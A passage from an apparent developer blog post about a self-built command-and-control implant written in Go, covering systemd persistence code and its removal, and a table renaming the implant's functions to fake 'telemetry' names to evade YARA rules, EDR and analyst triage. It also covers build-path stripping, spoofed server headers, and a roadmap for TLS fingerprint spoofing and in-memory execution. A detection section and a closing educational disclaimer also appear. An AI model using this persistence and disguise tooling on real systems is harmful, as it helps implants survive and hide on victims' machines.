        return fmt.Errorf("creating unit dir: %w", err)
    }

    unitContent := fmt.Sprintf(`[Unit]
Description=Endpoint Telemetry Diagnostics Daemon
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
ExecStart=%s
Restart=on-failure
RestartSec=30

[Install]
WantedBy=default.target
`, exePath)

    unitPath := filepath.Join(unitDir, ServiceLabel+".service")
    if err := os.WriteFile(unitPath, []byte(unitContent), 0644); err != nil {
        return fmt.Errorf("writing unit file: %w", err)
    }

    if out, err := exec.Command("systemctl", "--user", "daemon-reload").CombinedOutput(); err != nil {
        return fmt.Errorf("daemon-reload: %v: %s", err, out)
    }
    if out, err := exec.Command("systemctl", "--user", "enable", ServiceLabel+".service").CombinedOutput(); err != nil {
        return fmt.Errorf("enable: %v: %s", err, out)
    }

    return nil
}

A few design decisions here:

User-level, no root. The --user flag means this runs under the current user’s systemd instance. No sudo, no privilege escalation. The trade-off is that the service only runs while the user is logged in, unless the system has loginctl enable-linger set for that user. We don’t touch linger because it requires root or polkit authorization on most distros, and attempting it would be noisy.

Auto-restart. Restart=on-failure with RestartSec=30 means if the agent crashes, systemd brings it back after 30 seconds. Free reliability that I don’t have to implement in the agent itself.

Network dependency. After=network-online.target and Wants=network-online.target mean the service waits for network connectivity before starting. Without this, the agent would start, fail its first check-in because the network isn’t up yet, and either error out or waste cycles retrying during boot.

$HOME check. If $HOME is unset (some container environments, some su configurations), the install fails with a clear error instead of silently writing the unit file to .config/systemd/user/ relative to whatever the current working directory happens to be.

Removal is symmetric: disable, stop, delete the unit file, daemon-reload. The symmetry matters because the self-destruct sequence calls RemoveAutoUpdater(), and a removal path that doesn’t undo everything the install did will leave artifacts.
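A sketch of what that symmetric removal path can look like. The names `removeUpdateDaemon` and `unitPathFor` are illustrative, not the framework's actual identifiers (the post only names the public entry point, `RemoveAutoUpdater()`):

```go
package main

import (
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
)

// unitPathFor rebuilds the same path the install wrote to, so install
// and removal can never drift apart.
func unitPathFor(home, label string) string {
	return filepath.Join(home, ".config", "systemd", "user", label+".service")
}

// removeUpdateDaemon mirrors the install in reverse:
// disable, stop, delete the unit file, daemon-reload.
func removeUpdateDaemon(label string) error {
	home := os.Getenv("HOME")
	if home == "" {
		return fmt.Errorf("$HOME is not set")
	}
	// Disable first so systemd drops its WantedBy symlink, then stop the
	// running instance before the unit file disappears out from under it.
	exec.Command("systemctl", "--user", "disable", label+".service").Run()
	exec.Command("systemctl", "--user", "stop", label+".service").Run()
	if err := os.Remove(unitPathFor(home, label)); err != nil && !os.IsNotExist(err) {
		return err
	}
	return exec.Command("systemctl", "--user", "daemon-reload").Run()
}

func main() {
	fmt.Println(unitPathFor("/home/alice", "EndpointAutoUpdate"))
}
```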

macOS

Not implemented. The build server rejects macOS builds with persist_method != "none" at compile time. macOS persistence would need a LaunchAgent plist in ~/Library/LaunchAgents/, which is a different mechanism. Phase 3 (probably).


10. Cover-Story Naming

The original problem: strings agent.exe | grep -i "persist\|exfil\|command" would immediately classify the binary. Even with symbols stripped (-s -w), Go embeds function names for runtime reflection and stack traces.

Every function, variable, source file, and the Go module itself now follows an “endpoint telemetry/diagnostics” naming convention.

| What Changed | Before | After |
| --- | --- | --- |
| Check-in function | checkIn() | SyncDeviceState() |
| Result submission | sendResult() | SubmitDiagnosticReport() |
| Self-destruct | SelfDestruct() | WipeLocalCacheAndExit() |
| Persistence | persist() | InstallAutoUpdater() |
| Shell execution | ExecuteCommand() | ExecuteDiagnosticTask() |
| Direct execution | RunDirectCommand() | RunDiagnosticProbe() |
| File upload | UploadFile() | SubmitCrashDump() |
| File download | DownloadFile() | FetchUpdatePackage() |
| Encryption | EncryptPayload() | SealTelemetry() |
| Decryption | DecryptPayload() | UnsealTelemetry() |
| Jitter calculation | CalculateJitter() | CalculateBackoff() |
| Go module | c2-agent | endpoint-telemetry |

Source files got the same treatment: selfdestruct.go -> cache_purge.go, persist.go -> auto_updater.go, shell.go -> exec_diag.go, transfer.go -> dump_sync.go.

Build metadata cleanup. -trimpath strips absolute host build paths from the binary. Without it, strings reveals C:\Users\<USER>\Desktop\repos\C2-Project\agent\funcs\selfdestruct.go, which is not exactly subtle. -buildid= clears the per-build hash. The Go module rename (c2-agent -> endpoint-telemetry) handles the module name that Go embeds in every binary regardless of strip flags.

Will a skilled reverse engineer be fooled? No. Once they’re reading disassembly and tracing data flows, the names are irrelevant. But this isn’t about defeating human analysis. It’s about surviving automated classification: YARA rules matching suspicious function names, EDR heuristics looking for known-bad string patterns, the SOC analyst running a quick strings triage before deciding whether to escalate. If the names say “telemetry” and “diagnostics,” the binary goes to the bottom of the priority queue instead of the top.


11. Server Hardening

Three problems from the original, three fixes.

API Key Authentication

All /api/* endpoints now require a valid X-API-Key header:

@app.before_request
def check_api_key():
    if request.path.startswith("/api/"):
        key = request.headers.get("X-API-Key", "")
        stored_key = _get_config_value("api_key")
        if not stored_key or not hmac.compare_digest(key, stored_key):
            return jsonify({"error": "Unauthorized"}), 401

The key is a 32-character hex string generated at first launch and stored in server_config. It’s printed to the operator’s terminal on startup.

The hmac.compare_digest instead of == is a small detail that matters. Normal string comparison in Python short-circuits on the first differing byte. If you’re comparing a3f7c2e1 against a3f7xxxx, Python returns False as soon as it hits the 5th byte. Timing that comparison over many requests can theoretically leak how many leading bytes are correct. hmac.compare_digest runs in constant time regardless of where the strings differ. In practice, timing attacks over a network against a local API key are extremely hard to pull off, but the defense is one function call, so why not.
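For completeness, the Go standard library has the same primitive in crypto/subtle, in case a comparable check ever lands on the agent side. A minimal sketch; `keysEqual` is an illustrative helper, not framework code:

```go
package main

import (
	"crypto/subtle"
	"fmt"
)

// keysEqual compares two secrets in constant time. subtle.ConstantTimeCompare
// returns 1 only when the byte slices are equal, and its running time depends
// on the length of the inputs, not on where they first differ.
func keysEqual(a, b string) bool {
	return subtle.ConstantTimeCompare([]byte(a), []byte(b)) == 1
}

func main() {
	fmt.Println(keysEqual("a3f7c2e1", "a3f7c2e1")) // true
	fmt.Println(keysEqual("a3f7c2e1", "a3f7xxxx")) // false
}
```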

The dashboard prompts for the key on load, stores it in sessionStorage (wiped when the tab closes, not persisted across sessions), and injects it into every outbound API call through a centralized apiFetch() wrapper.

Server Header Spoofing

@app.after_request
def cloak_server_header(response):
    response.headers["Server"] = "nginx/1.24.0"
    return response

Every response now claims to be nginx instead of Werkzeug/3.x Python/3.x. It won’t survive deep probing (Flask’s error page format and response timing are distinct from nginx), but it defeats shallow fingerprinting.

Debug Mode

Off. The MVP had debug=True, which exposes the Werkzeug interactive debugger. If any route throws an unhandled exception, the debugger gives anyone with network access a full Python REPL on the C2 server. That’s a remote code execution vulnerability on your own infrastructure. Not great.


12. The CurrentDir Race Fix

This isn’t a new feature, but it’s a fix I specifically called out as pending in the first blog post, so I should close the loop.

The original code tracked the agent’s working directory in a global CurrentDir variable. cd commands wrote to it synchronously in the main loop, but regular commands read from it concurrently in goroutines. Running go run -race would flag this as a data race immediately.

The fix is a sync.RWMutex:

var (
    currentDirMu sync.RWMutex
    CurrentDir   string
)

func getCurrentDir() string {
    currentDirMu.RLock()
    defer currentDirMu.RUnlock()
    return CurrentDir
}

func setCurrentDir(dir string) {
    currentDirMu.Lock()
    defer currentDirMu.Unlock()
    CurrentDir = dir
}

Read-lock in every command execution path (ExecuteDiagnosticTask, RunDiagnosticProbe), write-lock in handleCd. Multiple commands can read the working directory concurrently (since they take read-locks), and a cd command blocks until all in-flight reads complete before writing.
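A quick way to convince yourself the fix holds is to hammer both accessors from goroutines and run the result under go run -race. With the locks in place the race detector stays quiet; strip them out and it flags the conflict immediately. The goroutine counts below are arbitrary:

```go
package main

import (
	"fmt"
	"sync"
)

var (
	currentDirMu sync.RWMutex
	CurrentDir   string
)

func getCurrentDir() string {
	currentDirMu.RLock()
	defer currentDirMu.RUnlock()
	return CurrentDir
}

func setCurrentDir(dir string) {
	currentDirMu.Lock()
	defer currentDirMu.Unlock()
	CurrentDir = dir
}

func main() {
	var wg sync.WaitGroup
	// Fifty concurrent readers, standing in for in-flight commands...
	for i := 0; i < 50; i++ {
		wg.Add(1)
		go func() { defer wg.Done(); _ = getCurrentDir() }()
	}
	// ...racing one writer, standing in for handleCd.
	wg.Add(1)
	go func() { defer wg.Done(); setCurrentDir("/tmp") }()
	wg.Wait()
	fmt.Println(getCurrentDir()) // /tmp
}
```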


13. What’s Still Detectable

I fixed every IOC from the first post. But “fixed” doesn’t mean “invisible.” Here’s what a competent blue team can still catch.

JA3 fingerprint mismatch. The browser profile spoofing works at the HTTP level. The TLS handshake still uses Go’s TLS stack, which produces a distinctive JA3 hash. A defender correlating JA3 against the User-Agent would see Chrome headers but a Go TLS fingerprint. The fix is uTLS (Phase 3).

Windows event logging. The COM-based scheduled task avoids schtasks.exe in the process tree, but the task creation still generates Event ID 4698 in the Security log. Any SIEM forwarding Windows events will see it, and most are.

systemd is not invisible. systemctl --user list-unit-files lists the service. The unit file sits in ~/.config/systemd/user/. File integrity monitoring catches it. A manual check catches it.

The cleanup batch script. On Windows self-destruct, the batch file written to disk with del /f /q loops is a forensic artifact. Better approaches exist (PowerShell Start-Process, MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT). Phase 3.

Bounded jitter. Traffic never exceeds JitterMax and never drops below JitterMin. That bounding box is a weak but extractable signal given enough observation time.

Process parentage. Even in exec mode, an unsigned binary spawning system utilities is unusual. No cmd.exe in between, but the parent-child relationship is still visible to an EDR that cares about who spawned whoami.exe.

DNS and IP reputation. None of this evasion work matters if the callback IP is already flagged. Threat intelligence feeds operate outside the agent’s control entirely.

No nonce replay tracking. The AES-256-GCM encryption uses random nonces and authenticated encryption, but the server doesn’t track seen nonces. An attacker with network access could replay a captured check-in blob. It would decrypt to a valid but stale payload. The server would process it as a duplicate check-in (mostly harmless), but it’s a gap in the design.
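Closing that gap would be a small amount of server-side state. The sketch below shows the mechanism in Go rather than the server's actual Python, and `nonceCache` is an illustrative type, not part of the framework: remember every GCM nonce seen and reject duplicates. A production version would also need time-based eviction (e.g. keyed to a timestamp inside the authenticated payload) so the set stays bounded.

```go
package main

import (
	"fmt"
	"sync"
)

// nonceCache is a sketch of server-side replay tracking: remember every
// nonce presented inside the replay window and reject duplicates.
type nonceCache struct {
	mu   sync.Mutex
	seen map[string]struct{}
}

func newNonceCache() *nonceCache {
	return &nonceCache{seen: make(map[string]struct{})}
}

// Check returns true the first time a nonce is presented, false on replay.
func (c *nonceCache) Check(nonce []byte) bool {
	c.mu.Lock()
	defer c.mu.Unlock()
	key := string(nonce)
	if _, dup := c.seen[key]; dup {
		return false
	}
	c.seen[key] = struct{}{}
	return true
}

func main() {
	cache := newNonceCache()
	n := []byte{0x01, 0x02, 0x03}
	fmt.Println(cache.Check(n)) // true  – first sight, process the check-in
	fmt.Println(cache.Check(n)) // false – replay, drop it
}
```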


14. Phase 3 Roadmap

JA3 fingerprint spoofing. Integrate uTLS to mimic a specific browser’s TLS handshake. If you’re spoofing Chrome at the HTTP level, you should be spoofing Chrome at the TLS level too.

In-memory payload execution. The agent currently touches disk as a binary. Phase 3 explores reflective loading and in-memory execution (still very much in the research phase).

macOS persistence. LaunchAgent plists in ~/Library/LaunchAgents/ (if I can get my hands on a MacBook to do testing).

Interactive shell sessions. The current model is request-response: send a command, get output. Phase 3 adds persistent shell sessions with piped I/O for interactive tooling.

Traffic shaping. Varying payload sizes and timing to mimic legitimate application traffic (Slack webhooks, Windows Update telemetry, cloud API calls) instead of just randomizing the interval.

Agent chaining. Using a compromised host to relay traffic for agents that can’t reach the C2 server directly.

This list is subject to change as I continually research better methods and more features. The most up-to-date version will always be in the README.md in the GitHub repo.


Phase 1 started as a framework that would get caught by strings and a regex. It now requires behavioral analysis, process tree correlation, TLS fingerprinting, or Windows event log forwarding. The gap between those two levels of detection effort is where all the engineering in this post lives. Every fix moved the detection bar from “automated scan” to “manual investigation,” and understanding exactly where that bar sits now, and why it can’t go higher without the Phase 3 work, is the whole point of building from scratch.

This framework is built for educational purposes only.